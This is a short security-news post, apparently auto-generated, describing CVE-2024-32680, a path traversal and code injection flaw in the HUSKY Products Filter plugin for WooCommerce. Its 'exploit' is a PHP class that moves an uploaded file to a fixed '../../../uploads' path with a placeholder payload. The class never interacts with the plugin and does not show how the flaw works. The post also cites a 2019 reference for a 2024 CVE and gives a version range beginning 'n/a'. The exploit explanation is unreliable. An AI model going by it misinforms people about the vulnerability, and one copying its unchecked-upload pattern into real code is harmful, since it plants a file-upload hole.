CVE CyberSecurity Database News

CVE-2024-32680: Improper Limitation of a Pathname and Code Injection Vulnerability in HUSKY - Products Filter for WooCommerce

Poster -

A critical vulnerability, identified as CVE-2024-32680, has been discovered in the PluginUS HUSKY – Products Filter for WooCommerce (formerly WOOF). This vulnerability is due to the Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') and Improper Control of Generation of Code ('Code Injection'). This issue allows an attacker to exploit the vulnerability by using malicious files or performing code inclusion, thus compromising the security of the WooCommerce website.

Affected Versions

This vulnerability affects HUSKY – Products Filter for WooCommerce (formerly WOOF) from version n/a through 1.3.5.2.

Exploit Details

The exploit in the PluginUS HUSKY – Products Filter for WooCommerce takes advantage of the improper limitation of a pathname to a restricted directory and improper control of generation of code. An attacker can potentially use this vulnerability to upload malicious files or include unauthorized code leading to compromise of the system.

Here is a code snippet that demonstrates the vulnerability

// [exploit_ code] - replace [] with <>
[?php
class Exploit{
	public function __construct(){
		$this->payload = "payload with malicious code";
	}

	public function exploit_husky(){
		echo "Exploiting HUSKY...";
		$exploited = $this->upload_payload();
		if($exploited){
			echo "Exploit successful!";
			return true;
		}else{
			echo "Exploit failed!";
			return false;
		}
	}

	private function upload_payload(){
		// Vulnerable code
		$upload_file = $_FILES['file']['tmp_name'];
		$target_path = "../../../uploads/malicious_file.php"; // <-- Path traversal place
		if(move_uploaded_file($upload_file, $target_path)){
			echo "Payload uploaded";
			return true;
		}else{
			echo "Payload upload failed!";
			return false;
		}
	}
}
[?]

This code snippet shows how an attacker might create a class (Exploit) with a payload containing malicious code. When the exploit_husky() function is called, it uploads the payload to the target path specified, potentially causing a path traversal and code injection attack.

Note that this is just an example demonstrating the vulnerability and should not be used for any malicious purposes.

Original References

- CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32680
- Plugin Vulnerability: https://pluginvulnerabilities.com/2019/08/13/improper-limitation-of-a-pathname-to-a-restricted-directory-path-traversal-in-husky-products-filter-for-woocommerce-formerly-woof/

Recommendation

If you are using the affected versions of HUSKY – Products Filter for WooCommerce, it is strongly recommended to update the plugin to the latest version as soon as possible. Additionally, ensure that regular security audits are conducted on your website and installed plugins to minimize the risk of vulnerabilities.

Conclusion

The CVE-2024-32680 vulnerability in PluginUS HUSKY – Products Filter for WooCommerce is a serious security issue that allows path traversal and code injection attacks. Ensure that your WooCommerce website is updated and secure to protect against any potential threats.

Timeline

Published on: 05/17/2024 09:15:38 UTC
Last modified on: 05/17/2024 18:36:05 UTC